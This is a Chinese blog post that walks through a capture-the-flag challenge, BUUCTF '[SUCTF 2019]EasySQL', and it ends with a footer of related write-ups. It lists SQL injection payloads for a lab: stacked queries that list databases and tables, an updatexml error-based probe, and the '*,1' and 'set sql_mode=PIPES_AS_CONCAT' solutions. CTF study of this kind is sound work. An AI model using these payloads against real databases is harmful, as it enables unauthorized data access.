BUUCTF-WEB:[SUCTF 2019]EasySQL 1

最新推荐文章于 2024-06-29 10:30:40 发布
最新推荐文章于 2024-06-29 10:30:40 发布
阅读量248 收藏
点赞数 1
分类专栏: # CTF&Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/113106770
版权

解题思路:

①先试试1'# 发现没有回显
②试试 有回显

③试试单引号注入

④试试用order by查询表的列数:1 order by 1

用不了联合注入了!

下面尝试使用堆叠注入:
payload:1;show databases;#

payload:1;show tables;#

payload:1;show columns from Flag;#(查询Flag表中的列)

到这一步,堆叠注入也没办法得出flag

既然同时他也没有报错信息,那报错注入也不用太考虑了。
1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)#      【nonono】
试下布尔盲住,结果发现不管怎么样都是返回nonono,就连数据库长度大于1这种探针都返回nonono,那基本可以放弃布尔盲注了。

小菜鸡做不出来了。。。

接下来是网上的两种解法,参照了网上大佬们的WP

解法1、
1)第一种是猜出了源码select $_POST[‘query’] || flag from Flag,

sql_mode 设置了 PIPES_AS_CONCAT 时,|| 就是字符串连接符,相当于CONCAT() 函数
当 sql_mode 没有设置 PIPES_AS_CONCAT 时 (默认没有设置),|| 就是逻辑或,相当于OR函数
第一种就按默认没有配置来进行,此时||就是逻辑或
||在命令执行中见过,
回顾:
command1;command2顺序执行
command1 || command2
如果command1执行失败,则执行command2
command1 && command2
如果command1执行成功,则执行command2

因此只需要将

$_POST[‘query’]

提交的数据换成*,1(如果直接写的话会被报错,且写在后面会失效)
解释:
sql=select.post[‘query’]."||flag from Flag";(拼接语句)
如果$post[‘query’]的数据为

*,1

sql语句就变成了select *,1||flag from Flag,
就是select *,1 from Flag,这样就直接查询出了Flag表中的所有内容。
此处的1是临时增加一列,列名为1且这一列的所有值都为1

执行payload:*,1

解法2、
(2)第二种是将||作为字符串连接符,因此需要在语句中更改其配置
sql_mode=PIPES_AS_CONCAT时即可
Payload:1;set sql_mode=PIPES_AS_CONCAT;select 1
拼接完之后:select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag
相当于是select 1 from Flag和select flag from Flag

 

 

Wαff1ε
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [SUCTF 2019]EasySQL
qq_42158602的博客
01-10 7515
打开界面 试了一下有三种显示 还有一个没有输出 可以堆叠注入 1;show databases; 1;show tables; 可以看到有一个Flag表 测试发现from flag都被过滤不能直接读到flag 想了很久想不到 看别人wp了~ 看见听说比赛的时候原理泄漏了的 select $_GET['query'] || flag from flag 是这样 md 谁想的到啊 别...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
1. **全局变量覆盖**: 在PHP 5.3.0之前,如果`register_globals`配置选项设为`ON`,那么HTTP请求中的变量(如GET、POST、COOKIE等)会被自动转换为全局变量。攻击者可以通过操纵这些请求参数来覆盖预定义的变量,...
[SUCTF 2019]EasySQL1
bring_coco的博客
09-22 7920
目标]Sql语句的堆叠注入[环境]Buuctf[工具]浏览器[分析]1.试试sql注入正常套路(1)先试试1有回显(2)再试试字母没有回显(3)试试单引号注入提示不一样,因此猜测这里有注入点(4)试试有多少列还是不成功,因此一般的联合查询在这里不能使用(5)基于时间的盲注和报错注入都需要嵌套联合查询语句来实现,因此可以跳过,直接试试布尔型盲注还是不成功2.利用堆叠注入(1)查找所有数据库(2)查询所有表名(3)查询Flag表中的列。
Buuctf-Web-[极客大挑战 2019]EasySQL1 解题过程和思路
最新发布
gjpqwertty的博客
06-29 1117
SQL注入挑战题,目标是通过构造恶意的SQL语句来绕过身份验证或获取数据库中的敏感信息。
[SUCTF 2019]EasySQL 1
tomatoff的博客
04-14 3468
1、进入页面,又是一道注入的题; 2、分别尝试了下输入不同的内容: (1)输入数字1 (2)输入字母a或者带引号的组合1’ (3)输入双引号的组合1" (4)输入a’ or ‘1’=‘1 判断代码对一部分字符进行了过滤; 3、 ...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
easysql-1.1
03-15
eclipse 3.3.x 操作数据库的小插件
[SUCTF 2019]EasySQL 1【sql_mode】
PromisingQ
07-27 526
进入靶场环境:http://cc6c0293-a268-489a-8b73-7ad6b73668c5.node3.buuoj.cn/ 输入 1 查询试试: 昨天刚做了一个堆叠的,先试试输入 1;show databases; 1;show tables; 发现目标 Flag ! 可是…然后就进行不下去了…菜鸡的我又去网上寻找思路: select $post['query']||flag from Flag 这是关键语句! 当 sql_mode 设置了 PIPES_AS_CONCAT 时,||
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2812
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多关于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值